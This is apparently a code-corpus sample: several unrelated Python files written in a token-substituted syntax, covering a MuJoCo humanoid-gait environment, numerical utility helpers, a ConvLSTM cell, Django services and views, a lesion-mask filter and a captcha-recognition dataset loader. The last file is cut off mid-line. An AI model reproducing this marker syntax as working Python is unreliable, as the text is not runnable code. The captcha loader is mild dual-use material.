<import_stmt>mujoco_py<import_from_stmt>pathlib Path<import_from_stmt>mushroom_rl.utils spaces<import_from_stmt>mushroom_rl.environments.mujoco MuJoCo ObservationType<import_from_stmt>mushroom_rl.utils.running_stats *<import_from_stmt>._external_simulation NoExternalSimulation MuscleSimulation<import_from_stmt>.reward_goals CompleteTrajectoryReward VelocityProfileReward MaxVelocityReward NoGoalReward HumanoidTrajectory<import_from_stmt>mushroom_rl.environments.mujoco_envs.humanoid_gait.utils quat_to_euler<class_stmt>HumanoidGait(MuJoCo)<block_start>""" Mujoco simulation of a Humanoid Model, based on: "A deep reinforcement learning based approach towards generating human walking behavior with a neuromuscular model". <NAME>., <NAME>., <NAME>., and <NAME>. (2019). """<def_stmt>__init__ self gamma=0.99 horizon=2000 n_intermediate_steps=10 use_muscles=<true> goal_reward=<none> goal_reward_params=<none> obs_avg_window=1 act_avg_window=1<block_start>""" Constructor. Args: gamma (float, 0.99): discount factor for the environment; horizon (int, 2000): horizon for the environment; n_intermediate_steps (int, 10): number of steps to apply the same action to the environment and wait for the next observation; use_muscles (bool): if external muscle simulation should be used for actions. If not apply torques directly to the joints; goal_reward (string, None): type of trajectory used for training Options available: 'trajectory' - Use trajectory in assets/GaitTrajectory.npz as reference; 'com_vel_trajectory' - Use only velocity trajectory of COM in assets/GaitTrajectory.npz as reference; 'vel_profile' - Velocity goal for the center of mass of the model to follow. The goal is given by a VelocityProfile instance (or subclass). And should be included in the ``goal_reward_params``; 'max_vel' - Tries to achieve the maximum possible velocity; None - Follows no goal(just tries to survive); goal_reward_params (dict, None): params needed for creation goal reward; obs_avg_window (int, 1): size of window used to average observations; act_avg_window (int, 1): size of window used to average actions. 
"""<line_sep>self.use_muscles=use_muscles<line_sep>self.goal_reward=goal_reward<line_sep>self.act_avg_window=act_avg_window<line_sep>self.obs_avg_window=obs_avg_window<line_sep>model_path=Path(__file__).resolve().parent.parent/"data"/"humanoid_gait"/"human7segment.xml"<line_sep>action_spec=["right_hip_frontal" "right_hip_sagittal" "right_knee" "right_ankle" "left_hip_frontal" "left_hip_sagittal" "left_knee" "left_ankle" ]<line_sep>observation_spec=[("root" ObservationType.JOINT_POS) ("right_hip_frontal" ObservationType.JOINT_POS) ("right_hip_sagittal" ObservationType.JOINT_POS) ("right_knee" ObservationType.JOINT_POS) ("right_ankle" ObservationType.JOINT_POS) ("left_hip_frontal" ObservationType.JOINT_POS) ("left_hip_sagittal" ObservationType.JOINT_POS) ("left_knee" ObservationType.JOINT_POS) ("left_ankle" ObservationType.JOINT_POS) ("root" ObservationType.JOINT_VEL) ("right_hip_frontal" ObservationType.JOINT_VEL) ("right_hip_sagittal" ObservationType.JOINT_VEL) ("right_knee" ObservationType.JOINT_VEL) ("right_ankle" ObservationType.JOINT_VEL) ("left_hip_frontal" ObservationType.JOINT_VEL) ("left_hip_sagittal" ObservationType.JOINT_VEL) ("left_knee" ObservationType.JOINT_VEL) ("left_ankle" ObservationType.JOINT_VEL) ]<line_sep>collision_groups=[("floor" ["floor"]) ("left_foot" ["left_foot"]) ("right_foot" ["right_foot"])]<line_sep>super().__init__(model_path.as_posix() action_spec observation_spec gamma=gamma horizon=horizon n_substeps=1 n_intermediate_steps=n_intermediate_steps collision_groups=collision_groups)<if_stmt>use_muscles<block_start>self.external_actuator=MuscleSimulation(self._sim)<line_sep>self.info.action_space=spaces.Box(*self.external_actuator.get_action_space())<block_end><else_stmt><block_start>self.external_actuator=NoExternalSimulation()<block_end>low,high=self.info.action_space.low.copy() self.info.action_space.high.copy()<line_sep>self.norm_act_mean=(high+low)/2.0<line_sep>self.norm_act_delta=(high-low)/2.0<line_sep>self.info.action_space.low[:]=-1.0<line_sep>self.info.action_space.high[:]=1.0<if_stmt>goal_reward_params<is><none><block_start>goal_reward_params=dict()<block_end><if_stmt>goal_reward<eq>"trajectory"<or>goal_reward<eq>"com_vel_trajectory"<block_start>control_dt=self._sim.model.opt.timestep<times>self._n_intermediate_steps<line_sep>self.goal_reward=CompleteTrajectoryReward(self._sim control_dt **goal_reward_params)<block_end><elif_stmt>goal_reward<eq>"vel_profile"<block_start>self.goal_reward=VelocityProfileReward(self._sim **goal_reward_params)<block_end><elif_stmt>goal_reward<eq>"max_vel"<block_start>self.goal_reward=MaxVelocityReward(self._sim **goal_reward_params)<block_end><elif_stmt>goal_reward<is><none><block_start>self.goal_reward=NoGoalReward()<block_end><else_stmt><block_start><raise>NotImplementedError("The specified goal reward has not been"<concat>"implemented: " goal_reward)<block_end><if_stmt>goal_reward<eq>"trajectory"<block_start>self.reward_weights=dict(live_reward=0.10 goal_reward=0.40 traj_vel_reward=0.50 move_cost=0.10 fall_cost=0.00)<block_end><elif_stmt>goal_reward<eq>"com_vel_trajectory"<block_start>self.reward_weights=dict(live_reward=0.00 goal_reward=0.00 traj_vel_reward=1.00 move_cost=0.00 fall_cost=0.00)<block_end><else_stmt><block_start>self.reward_weights=dict(live_reward=0.10 goal_reward=0.90 traj_vel_reward=0.00 move_cost=0.10 fall_cost=0.00)<block_end>self.info.observation_space=spaces.Box(*self._get_observation_space())<line_sep>self.mean_grf=RunningAveragedWindow(shape=(6 ) 
window_size=n_intermediate_steps)<line_sep>self.mean_vel=RunningExpWeightedAverage(shape=(3 ) alpha=0.005)<line_sep>self.mean_obs=RunningAveragedWindow(shape=self.info.observation_space.shape window_size=obs_avg_window)<line_sep>self.mean_act=RunningAveragedWindow(shape=self.info.action_space.shape window_size=act_avg_window)<block_end><def_stmt>step self action<block_start>action=((action.copy()<times>self.norm_act_delta)+self.norm_act_mean)<line_sep>state,reward,absorbing,info=super().step(action)<line_sep>self.mean_obs.update_stats(state)<line_sep>self.mean_vel.update_stats(self._sim.data.qvel[0:3])<line_sep>avg_obs=self.mean_obs.mean<line_sep>avg_obs[13:16]=self.mean_vel.mean<line_sep><return>avg_obs reward absorbing info<block_end><def_stmt>render self<block_start><if_stmt>self._viewer<is><none><block_start>self._viewer=mujoco_py.MjViewer(self._sim)<line_sep>self._viewer._render_every_frame=<true><block_end>self._viewer.render()<block_end><def_stmt>_setup self<block_start>self.goal_reward.reset_state()<line_sep>start_obs=self._reset_model(qpos_noise=0.0 qvel_noise=0.0)<line_sep>start_vel=(self._sim.data.qvel[0:3]<if>(self.goal_reward<is><none><or>isinstance(self.goal_reward MaxVelocityReward))<else>self.goal_reward.get_observation())<line_sep>self.mean_vel.reset(start_vel)<line_sep>self.mean_obs.reset(start_obs)<line_sep>self.mean_act.reset()<line_sep>self.external_actuator.reset()<block_end><def_stmt>_reward self state action next_state<block_start>live_reward=1.0<line_sep>goal_reward=self.goal_reward(state action next_state)<line_sep>traj_vel_reward=0.0<if_stmt>isinstance(self.goal_reward HumanoidTrajectory)<block_start>traj_vel_reward=np.exp(-20.0<times>np.square(next_state[13]-next_state[33]))<block_end>move_cost=self.external_actuator.cost(state action/self.norm_act_delta next_state)<line_sep>fall_cost=0.0<if_stmt>self._has_fallen(next_state)<block_start>fall_cost=1.0<block_end>total_reward=self.reward_weights["live_reward"]<times>live_reward+self.reward_weights["goal_reward"]<times>goal_reward+self.reward_weights["traj_vel_reward"]<times>traj_vel_reward-self.reward_weights["move_cost"]<times>move_cost-self.reward_weights["fall_cost"]<times>fall_cost<line_sep><return>total_reward<block_end><def_stmt>_is_absorbing self state<block_start><return>(self._has_fallen(state)<or>self.goal_reward.is_absorbing(state)<or>self.external_actuator.is_absorbing(state))<block_end><def_stmt>_get_observation_space self<block_start>sim_low,sim_high=(self.info.observation_space.low[2:] self.info.observation_space.high[2:])<line_sep>grf_low,grf_high=(-np.ones((6 ))<times>np.inf np.ones((6 ))<times>np.inf)<line_sep>r_low,r_high=self.goal_reward.get_observation_space()<line_sep>a_low,a_high=self.external_actuator.get_observation_space()<line_sep><return>(np.concatenate([sim_low grf_low r_low a_low]) np.concatenate([sim_high grf_high r_high a_high]))<block_end><def_stmt>_reset_model self qpos_noise=0.0 qvel_noise=0.0<block_start>self._set_state(self._sim.data.qpos+np.random.uniform(low=-qpos_noise high=qpos_noise size=self._sim.model.nq) self._sim.data.qvel+np.random.uniform(low=-qvel_noise high=qvel_noise size=self._sim.model.nv))<line_sep><return>self._create_observation()<block_end><def_stmt>_set_state self qpos qvel<block_start>old_state=self._sim.get_state()<line_sep>new_state=mujoco_py.MjSimState(old_state.time qpos qvel old_state.act old_state.udd_state)<line_sep>self._sim.set_state(new_state)<line_sep>self._sim.forward()<block_end>@staticmethod<def_stmt>_has_fallen 
state<block_start>torso_euler=quat_to_euler(state[1:5])<line_sep><return>((state[0]<l>0.90)<or>(state[0]<g>1.20)<or>abs(torso_euler[0])<g>np.pi/12<or>(torso_euler[1]<l>-np.pi/12)<or>(torso_euler[1]<g>np.pi/8)<or>(torso_euler[2]<l>-np.pi/4)<or>(torso_euler[2]<g>np.pi/4))<block_end><def_stmt>_create_observation self<block_start>""" Creates full vector of observations: obs[0:13] -> qpos(from mujoco obs) obs[0] -> torso z pos obs[1:5] -> torso quaternion orientation obs[5:13] -> leg joints angle obs[13:27] -> qvel(from mujoco obs) obs[13:16] -> torso linear velocity obs[16:19] -> torso angular velocity obs[19:27] -> leg joints angular velocity obs[27:30] -> ground force obs[27:30] -> ground force on right foot(xyz) obs[30:33] -> ground force on left foot(xyz) obs[33:33+(len(goal_observation)] -> observations related to the goal obs[last_obs_id - len(ext_actuator_obs): last_obs_id] -> observations related to the external actuator """<line_sep>obs=np.concatenate([super(HumanoidGait self)._create_observation()[2:] self.mean_grf.mean/1000. self.goal_reward.get_observation() self.external_actuator.get_observation()]).flatten()<line_sep><return>obs<block_end><def_stmt>_preprocess_action self action<block_start>action=self.external_actuator.preprocess_action(action)<line_sep>self.mean_act.update_stats(action)<line_sep><return>self.mean_act.mean<block_end><def_stmt>_step_init self state action<block_start>self.external_actuator.initialize_internal_states(state action)<block_end><def_stmt>_compute_action self action<block_start>action=self.external_actuator.external_stimulus_to_joint_torques(action)<line_sep><return>action<block_end><def_stmt>_simulation_post_step self<block_start>grf=np.concatenate([self._get_collision_force("floor" "right_foot")[:3] self._get_collision_force("floor" "left_foot")[:3]])<line_sep>self.mean_grf.update_stats(grf)<block_end><def_stmt>_step_finalize self<block_start>self.goal_reward.update_state()<line_sep>self.external_actuator.update_state()<block_end><def_stmt>_get_body_center_of_mass_pos self body_name<block_start><return>self._sim.data.subtree_com[self._sim.model._body_name2id[body_name]]<block_end><block_end>
<import_stmt>numpy<as>np<import_stmt>warnings<line_sep>SCALARTYPES=(complex float int np.number)<def_stmt>is_scalar f<block_start>"""Determine if the input argument is a scalar. The function **is_scalar** returns *True* if the input is an integer, float or complex number. The function returns *False* otherwise. Parameters ---------- f : Any input quantity Returns ------- bool : - *True* if the input argument is an integer, float or complex number - *False* otherwise """<if_stmt>isinstance(f SCALARTYPES)<block_start><return><true><block_end><elif_stmt>isinstance(f np.ndarray)<and>f.size<eq>1<and>isinstance(f[0] SCALARTYPES)<block_start><return><true><block_end><return><false><block_end><def_stmt>as_array_n_by_dim pts dim<block_start>"""Ensures the given array will have *dim* columns. The function **as_array_n_by_dim** will examine the *pts* array, and coerce it to be at least if the number of columns is equal to *dim*. This is similar to the :func:`numpy.atleast_2d`, except that it ensures that then input has *dim* columns, and it appends a :data:`numpy.newaxis` to 1D arrays instead of prepending. Parameters ---------- pts : array_like array to check. dim : int The number of columns which *pts* should have Returns ------- (n_pts, dim) numpy.ndarray verified array """<if_stmt>type(pts)<eq>list<block_start>pts=np.array(pts)<block_end><if_stmt><not>isinstance(pts np.ndarray)<block_start><raise>TypeError("pts must be a numpy array")<block_end><if_stmt>dim<g>1<block_start>pts=np.atleast_2d(pts)<block_end><elif_stmt>len(pts.shape)<eq>1<block_start>pts=pts[: np.newaxis]<block_end><if_stmt>pts.shape[1]<ne>dim<block_start><raise>ValueError("pts must be a column vector of shape (nPts, {0:d}) not ({1:d}, {2:d})".format(*((dim )+pts.shape)))<block_end><return>pts<block_end><def_stmt>requires modules<block_start>"""Decorator to wrap functions with soft dependencies. This function was inspired by the `requires` function of pysal, which is released under the 'BSD 3-Clause "New" or "Revised" License'. https://github.com/pysal/pysal/blob/master/pysal/lib/common.py Parameters ---------- modules : dict Dictionary containing soft dependencies, e.g., {'matplotlib': matplotlib}. Returns ------- decorated_function : function Original function if all soft dependencies are met, otherwise it returns an empty function which prints why it is not running. """<line_sep># Check the required modules, add missing ones in the list `missing`. 
missing=[]<for_stmt>key,item modules.items()<block_start><if_stmt>item<is><false><block_start>missing.append(key)<block_end><block_end><def_stmt>decorated_function function<block_start>"""Wrap function."""<if_stmt><not>missing<block_start><return>function<block_end><else_stmt><block_start><def_stmt>passer *args **kwargs<block_start>print(("Missing dependencies: {d}.".format(d=missing)))<line_sep>print(("Not running `{}`.".format(function.__name__)))<block_end><return>passer<block_end><block_end><return>decorated_function<block_end><def_stmt>deprecate_class removal_version=<none> new_location=<none> future_warn=<false><block_start><if_stmt>future_warn<block_start>Warning=FutureWarning<block_end><else_stmt><block_start>Warning=DeprecationWarning<block_end><def_stmt>decorator cls<block_start>my_name=cls.__name__<line_sep>parent_name=cls.__bases__[0].__name__<line_sep>message=f"{my_name} has been deprecated, please use {parent_name}."<if_stmt>removal_version<is><not><none><block_start>message<augadd>(f" It will be removed in version {removal_version} of discretize.")<block_end><else_stmt><block_start>message<augadd>" It will be removed in a future version of discretize."<block_end># stash the original initialization of the class cls._old__init__=cls.__init__<def_stmt>__init__ self *args **kwargs<block_start>warnings.warn(message Warning)<line_sep>self._old__init__(*args **kwargs)<block_end>cls.__init__=__init__<if_stmt>new_location<is><not><none><block_start>parent_name=f"{new_location}.{parent_name}"<block_end>cls.__doc__=f""" This class has been deprecated, see `{parent_name}` for documentation"""<line_sep><return>cls<block_end><return>decorator<block_end><def_stmt>deprecate_module old_name new_name removal_version=<none> future_warn=<false><block_start><if_stmt>future_warn<block_start>Warning=FutureWarning<block_end><else_stmt><block_start>Warning=DeprecationWarning<block_end>message=f"The {old_name} module has been deprecated, please use {new_name}."<if_stmt>removal_version<is><not><none><block_start>message<augadd>f" It will be removed in version {removal_version} of discretize"<block_end><else_stmt><block_start>message<augadd>" It will be removed in a future version of discretize."<block_end>message<augadd>" Please update your code accordingly."<line_sep>warnings.warn(message Warning)<block_end><def_stmt>deprecate_property new_name old_name removal_version=<none> future_warn=<false><block_start><if_stmt>future_warn<block_start>Warning=FutureWarning<block_end><else_stmt><block_start>Warning=DeprecationWarning<block_end><if_stmt>removal_version<is><not><none><block_start>tag=f" It will be removed in version {removal_version} of discretize."<block_end><else_stmt><block_start>tag=" It will be removed in a future version of discretize."<block_end><def_stmt>get_dep self<block_start>class_name=type(self).__name__<line_sep>message=(f"{class_name}.{old_name} has been deprecated, please use {class_name}.{new_name}."+tag)<line_sep>warnings.warn(message Warning)<line_sep><return>getattr(self new_name)<block_end><def_stmt>set_dep self other<block_start>class_name=type(self).__name__<line_sep>message=(f"{class_name}.{old_name} has been deprecated, please use {class_name}.{new_name}."+tag)<line_sep>warnings.warn(message Warning)<line_sep>setattr(self new_name other)<block_end>doc=f""" `{old_name}` has been deprecated. See `{new_name}` for documentation. 
See Also -------- {new_name} """<line_sep><return>property(get_dep set_dep <none> doc)<block_end><def_stmt>deprecate_method new_name old_name removal_version=<none> future_warn=<false><block_start><if_stmt>future_warn<block_start>Warning=FutureWarning<block_end><else_stmt><block_start>Warning=DeprecationWarning<block_end><if_stmt>removal_version<is><not><none><block_start>tag=f" It will be removed in version {removal_version} of discretize."<block_end><else_stmt><block_start>tag=" It will be removed in a future version of discretize."<block_end><def_stmt>new_method self *args **kwargs<block_start>class_name=type(self).__name__<line_sep>warnings.warn(f"{class_name}.{old_name} has been deprecated, please use {class_name}.{new_name}."+tag Warning )<line_sep><return>getattr(self new_name)(*args **kwargs)<block_end>doc=f""" `{old_name}` has been deprecated. See `{new_name}` for documentation See Also -------- {new_name} """<line_sep>new_method.__doc__=doc<line_sep><return>new_method<block_end><def_stmt>deprecate_function new_function old_name removal_version=<none> future_warn=<false><block_start><if_stmt>future_warn<block_start>Warning=FutureWarning<block_end><else_stmt><block_start>Warning=DeprecationWarning<block_end>new_name=new_function.__name__<if_stmt>removal_version<is><not><none><block_start>tag=f" It will be removed in version {removal_version} of discretize."<block_end><else_stmt><block_start>tag=" It will be removed in a future version of discretize."<block_end><def_stmt>dep_function *args **kwargs<block_start>warnings.warn(f"{old_name} has been deprecated, please use {new_name}."+tag Warning )<line_sep><return>new_function(*args **kwargs)<block_end>doc=f""" `{old_name}` has been deprecated. See `{new_name}` for documentation See Also -------- {new_name} """<line_sep>dep_function.__doc__=doc<line_sep><return>dep_function<block_end># DEPRECATIONS isScalar=deprecate_function(is_scalar "isScalar" removal_version="1.0.0" future_warn=<false>)<line_sep>asArray_N_x_Dim=deprecate_function(as_array_n_by_dim "asArray_N_x_Dim" removal_version="1.0.0" future_warn=<false>)<line_sep>
<import_stmt>tensorflow<as>tf<import_from_stmt>network.Util smart_shape<line_sep>RNNCell=tf.nn.rnn_cell.RNNCell<line_sep>LSTMStateTuple=tf.nn.rnn_cell.LSTMStateTuple<def_stmt>_conv2d x W strides=<none><block_start><if_stmt>strides<is><none><block_start>strides=[1 1]<block_end><return>tf.nn.conv2d(x W strides=[1]+strides+[1] padding="SAME")<block_end><def_stmt>dynamic_conv_rnn cell inputs sequence_length=<none> initial_state=<none> dtype=<none> parallel_iterations=<none> swap_memory=<false> time_major=<false> scope=<none># inputs should have shape (time, batch, height, width, feature) <block_start>input_shape=smart_shape(inputs)<line_sep>num_units=cell.num_units()<line_sep>h,final_state=tf.nn.dynamic_rnn(cell inputs sequence_length initial_state dtype parallel_iterations swap_memory time_major scope)<line_sep>h=tf.reshape(h tf.stack([input_shape[0] input_shape[1] input_shape[2] input_shape[3] num_units]))<line_sep><return>h final_state<block_end># similar to https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/rnn/python/ops/core_rnn_cell_impl.py # for maximal flexibility we allow to pass the weights externally <class_stmt>ConvLSTMCell(RNNCell)<block_start><def_stmt>__init__ self num_units height width filter_size forget_bias=1.0 activation=tf.tanh W=<none> b=<none><block_start>self._num_units=num_units<line_sep>self._height=height<line_sep>self._width=width<line_sep>self._size=num_units<times>height<times>width<line_sep>self._forget_bias=forget_bias<line_sep>self._activation=activation<line_sep>self._filter_size=list(filter_size)<if_stmt>W<is><not><none><block_start>W_shape=W.get_shape().as_list()<assert_stmt>len(W_shape)<eq>4<assert_stmt>W_shape[:2]<eq>self._filter_size<assert_stmt>W_shape[-1]<eq>4<times>self._num_units<line_sep>self._W=W<block_end><else_stmt><block_start>self._W=<none><block_end><if_stmt>b<is><not><none><block_start>b_shape=b.get_shape().as_list()<assert_stmt>len(b_shape)<eq>1<assert_stmt>b_shape[0]<eq>4<times>self._num_units<line_sep>self._b=b<block_end><else_stmt><block_start>self._b=<none><block_end><block_end><def_stmt>__call__ self inputs state scope=<none>#inputs: `2-D` tensor with shape `[batch_size x input_size]`. #state: tuple with shapes `[batch_size x s] for s in self.state_size <block_start><with_stmt>tf.variable_scope(scope<or>type(self).__name__)# "ConvLSTMCell" # Parameters of gates are concatenated into one multiply for efficiency. 
<block_start>c,h=state<line_sep>concat=self._conv(inputs h)<line_sep># i = input_gate, j = new_input, f = forget_gate, o = output_gate i,j,f,o=tf.split(axis=3 num_or_size_splits=4 value=concat)<line_sep>batch=inputs.get_shape().as_list()[0]<if_stmt>batch<is><none><block_start>batch=tf.shape(inputs)[0]<block_end>i,j,f,o=[tf.reshape(x [batch -1])<for>x [i j f o]]<line_sep>new_c=(c<times>tf.sigmoid(f+self._forget_bias)+tf.sigmoid(i)<times>self._activation(j))<line_sep>new_h=self._activation(new_c)<times>tf.sigmoid(o)<line_sep>new_state=LSTMStateTuple(new_c new_h)<line_sep><return>new_h new_state<block_end><block_end><def_stmt>_conv self inputs h<block_start>batch=inputs.get_shape().as_list()[0]<if_stmt>batch<is><none><block_start>batch=tf.shape(inputs)[0]<block_end>n_input_features=inputs.get_shape().as_list()[-1]<line_sep>#inputs = tf.reshape(inputs, [batch, self._height, self._width, n_input_features]) h=tf.reshape(h [batch self._height self._width self._num_units])<line_sep>inp=tf.concat([inputs h] axis=3)<if_stmt>self._W<is><not><none><block_start>W=self._W<assert_stmt>W.get_shape().as_list()[2]<eq>n_input_features+self._num_units<block_end><else_stmt><block_start>W=tf.get_variable("W" shape=(self._filter_size+[n_input_features+self._num_units 4<times>self._num_units]))<block_end><if_stmt>self._b<is><not><none><block_start>b=self._b<block_end><else_stmt><block_start>zero_initializer=tf.constant_initializer(0.0 dtype=inputs.dtype)<line_sep>b=tf.get_variable("b" shape=(4<times>self._num_units) initializer=zero_initializer)<block_end>y=_conv2d(inp W)+b<line_sep><return>y<block_end><def_stmt>num_units self<block_start><return>self._num_units<block_end>@property<def_stmt>state_size self<block_start><return>LSTMStateTuple(self._size self._size)<block_end>@property<def_stmt>output_size self<block_start><return>self._size<block_end><block_end>
<import_stmt>apps.common.func.InitDjango<import_from_stmt>all_models.models TbUser TbAdminUserPermissionRelation<import_from_stmt>apps.common.func.WebFunc *<class_stmt>UserService(object)<block_start>@staticmethod<def_stmt>getUsers <block_start><return>TbUser.objects.all()<block_end>@staticmethod<def_stmt>getUserByLoginname loginname<block_start><return>TbUser.objects.filter(loginName=loginname)<block_end>@staticmethod<def_stmt>updateUser userData<block_start>tbModel=TbUser.objects.filter(id=userData["id"])<line_sep>tbModel.update(**userData)<block_end><block_end><if_stmt>__name__<eq>"__main__"# print(UserService.getUsers()[0]) #permissionDict = UserPermission.getUserPermissions("liyc", "/interfaceTest/HTTP_InterfaceListCheck") #print(permissionDict) # print("permissionDict:", permissionDict) #print("interfaceDict:", interfaceDict) <block_start>permissionsList=UserPermission.getOthersPermissions("liyc" ['lining02' 'gaozhe' 'qinjp' 'yongwy' 'pengjie' 'tanglu' 'hongln'] "/interfaceTest/HTTP_GlobalTextConfListPage")<line_sep># print("permissionsList:", permissionsList) <block_end># print(UserService.getUserByLoginname(UserService.getUsers()[0].loginName))
# -*- coding: UTF-8 -*- <import_stmt>os<import_from_stmt>torch.utils.data DataLoader Dataset<import_stmt>torchvision.transforms<as>transforms<import_from_stmt>PIL Image<import_stmt>one_hot_encoding<as>ohe<import_stmt>captcha_setting<import_stmt>numpy<as>np<import_stmt>cv2<class_stmt>mydataset(Dataset)<block_start><def_stmt>__init__ self folder folder_2=<none> transform=<none><block_start>self.train_image_file_paths=[os.path.join(folder image_file)<for>image_file os.listdir(folder)]<if_stmt>(folder_2<is><not><none>)<block_start>self.train_image_file_paths=self.train_image_file_paths+[os.path.join(folder_2 image_file)<for>image_file os.listdir(folder_2)]<block_end>print(len(self.train_image_file_paths))<line_sep>self.transform=transform<block_end><def_stmt>__len__ self<block_start><return>len(self.train_image_file_paths)<block_end><def_stmt>__getitem__ self idx<block_start>image_root=self.train_image_file_paths[idx]<line_sep>image_name=image_root.split('/')[-1]<line_sep>image=Image.open(image_root)<line_sep>#print(image) fix_size=(160 60)<line_sep>image=image.resize(fix_size)<line_sep># print(image_name) <if_stmt>self.transform<is><not><none><block_start>image=self.transform(image)<block_end># print(image_name) <if_stmt>('_'<in>image_name)<block_start>label=ohe.encode(image_name.split('_')[0].upper())<block_end><else_stmt><block_start>label=ohe.encode(image_name.split('.')[0].upper())<block_end><return>image label image_name<block_end><block_end><def_stmt>gaussian_blur img<block_start>image=np.array(img)<line_sep>image_blur=cv2.GaussianBlur(image (5 5) 3)<line_sep>new_image=image_blur<line_sep><return>new_image<block_end>transform=transforms.Compose([# transforms.ColorJitter(), transforms.Grayscale() # transforms.Lambda(gaussian_blur), transforms.ToTensor() # transforms.Normalize(mean=[0.9], std=[0.4]), ])<def_stmt>get_train_data_loader s=<true> d=200<block_start>print('data path: ' captcha_setting.TRAIN_DATASET_PATH)<line_sep># dataset = mydataset(captcha_setting.TRAIN_DATASET_PATH, captcha_setting.TRAIN_DATASET_PATH_2, transform=transform) dataset=mydataset(captcha_setting.TRAIN_DATASET_PATH transform=transform)<line_sep><return>DataLoader(dataset batch_size=512 shuffle=s)<block_end><def_stmt>get_test_train_data_loader s=<true> d=256<block_start>dataset=mydataset(captcha_setting.TRAIN_DATASET_PATH transform=transform)<line_sep><return>DataLoader(dataset batch_size=d shuffle=s)<block_end><def_stmt>get_test_data_loader s=<false> d=1<block_start>print(captcha_setting.TEST_DATASET_PATH)<line_sep>dataset=mydataset(captcha_setting.TEST_DATASET_PATH transform=transform)<line_sep><return>DataLoader(dataset batch_size=d shuffle=s)<block_end><def_stmt>get_predict_data_loader s=<true> d=1<block_start>dataset=mydataset(captcha_setting.PREDICT_DATASET_PATH transform=transform)<line_sep><return>DataLoader(dataset batch_size=d shuffle=s)<block_end>
<import_stmt>numpy<as>np<import_from_stmt>scipy misc<import_stmt>os<import_stmt>scipy.io<import_from_stmt>PIL Image<def_stmt>filter base_root crops_list='crops_LiTS_gt.txt' input_config='masked_out_lesion' results_list='detection_lesion_example' th=0.5<block_start>crops_list=base_root+'utils/crops_list/'+crops_list<line_sep>results_list=base_root+'detection_results/'+results_list+'/soft_results.txt'<if_stmt>crops_list<is><not><none><block_start><with_stmt>open(crops_list)<as>t<block_start>crops_lines=t.readlines()<block_end><block_end>input_results_path=base_root+'results/'+input_config<line_sep>output_results_path=base_root+'results/det_'+input_config<if_stmt><not>os.path.exists(os.path.join(output_results_path))<block_start>os.makedirs(os.path.join(output_results_path))<block_end><if_stmt>results_list<is><not><none><block_start><with_stmt>open(results_list)<as>t<block_start>results_lines=t.readlines()<block_end><block_end><for_stmt>i range(105 131)<block_start>folder_name=str(i)<line_sep>images=[]<line_sep>nm=folder_name+'/'<for_stmt>x results_lines<block_start><if_stmt>nm<in>x<block_start>images.append(x)<block_end><block_end>slices_names=[]<if_stmt><not>os.path.exists(os.path.join(output_results_path folder_name))<block_start>os.makedirs(os.path.join(output_results_path folder_name))<block_end><for_stmt>j range(len(images))<block_start>slices_names.append(images[j].split()[0])<block_end>unique_slices_names=np.unique(slices_names)<for_stmt>x range(len(unique_slices_names))<block_start>total_mask=[]<for_stmt>l range(len(slices_names))<block_start><if_stmt>slices_names[l]<eq>unique_slices_names[x]<block_start><if_stmt>float(images[l].split()[3])<g>th<block_start>aux_mask=np.zeros([512 512])<line_sep>x_bb=int(float(images[l].split()[1]))<line_sep>y_bb=int(float(images[l].split()[2].split('\n')[0]))<line_sep>aux_name=images[l].split()[0]+'.png'<line_sep>total_patch=(np.array(Image.open(os.path.join(input_results_path aux_name)) dtype=np.uint8))/255.0<line_sep>cropped_patch=total_patch[x_bb:(x_bb+80) y_bb:(y_bb+80)]<line_sep>aux_mask[x_bb:(x_bb+80) y_bb:(y_bb+80)]=cropped_patch<line_sep>total_mask.append(aux_mask)<block_end><block_end><block_end><if_stmt>len(total_mask)<g>0<block_start><if_stmt>len(total_mask)<g>1<block_start>summed_mask=np.sum(total_mask axis=0)<block_end><else_stmt><block_start>summed_mask=np.array(total_mask)[0]<block_end>thresholded_total_mask=np.greater(total_mask 0.0).astype(float)<line_sep>summed_thresholded_total_mask=np.sum(thresholded_total_mask axis=0)<line_sep>summed_thresholded_total_mask[summed_thresholded_total_mask<eq>0.0]=1.0<line_sep>summed_mask=np.divide(summed_mask summed_thresholded_total_mask)<line_sep>summed_mask=summed_mask<times>255.0<line_sep>name=unique_slices_names[x].split('.')[0]+'.png'<line_sep>scipy.misc.imsave(os.path.join(output_results_path name) summed_mask)<block_end><block_end><block_end><for_stmt>i range(len(crops_lines))<block_start>result=crops_lines[i].split(' ')<if_stmt>len(result)<g>2<block_start>id_img,bool_zoom,mina,maxa,minb,maxb=result<block_end><else_stmt><block_start>id_img,bool_zoom=result<block_end><if_stmt>int(id_img.split('/')[-2])<g>104<block_start><if_stmt><not>os.path.exists(os.path.join(output_results_path id_img+'.png'))<block_start>mask=np.zeros([512 512])<line_sep>misc.imsave(os.path.join(output_results_path id_img+'.png') mask)<block_end><block_end><block_end><block_end>
<import_stmt>datetime<import_stmt>json<import_stmt>re<import_stmt>os<import_stmt>requests<import_stmt>time<import_stmt>threading<import_stmt>pickle<import_from_stmt>django.core.mail send_mail<import_from_stmt>django.db connection<import_from_stmt>django.http JsonResponse<import_from_stmt>django.shortcuts render_to_response render<import_from_stmt>django.core.cache cache<import_from_stmt>ApiManager.utils schedule<import_from_stmt>ApiManager.utils.case_utils run_case_by_id<import_from_stmt>ApiManager.utils.forms TaskModelForm<import_from_stmt>ApiManager.models ProjectInfo ModuleInfo TestCaseInfo EnvInfo TaskInfo ReportInfo TaskFailedRecord<import_from_stmt>frame.utils.common get_ajax_msg dataToJson<import_from_stmt>ApiManager.utils.forms get_validate_form_msg<import_from_stmt>ApiManager.utils.utils pagination_for_objects<import_from_stmt>Joy_QA_Platform.settings EMAIL_FROM<import_from_stmt>Joy_QA_Platform.configs AUTH_ADD_TASK AUTH_DELETE AUTH_UPDATE AUTH_VIEW EMAIL_SUFFIX<line_sep>is_timer_start=<false><line_sep>run_task_list=[]<line_sep>run_job_dict={}<def_stmt>task_list request<block_start><if_stmt>request.method<eq>"GET"<block_start><return>render(request 'api/task_list.html')<block_end><elif_stmt>request.method<eq>"POST"<block_start>index=int(request.POST.get('index'))<line_sep>env_name_dic={}<line_sep>project_name_dic={}<line_sep>module_name_dic={}<line_sep>results=filter_tasks_for_user(request.user TaskInfo.objects.filter().order_by('-id') AUTH_VIEW)<line_sep>tasks=pagination_for_objects(results index)<if_stmt>tasks<is><not><none><and>len(tasks)<g>0<block_start><for_stmt>task tasks<block_start>append_env_dict(task env_name_dic)<line_sep>append_project_dict(task project_name_dic)<line_sep>append_module_dict(task 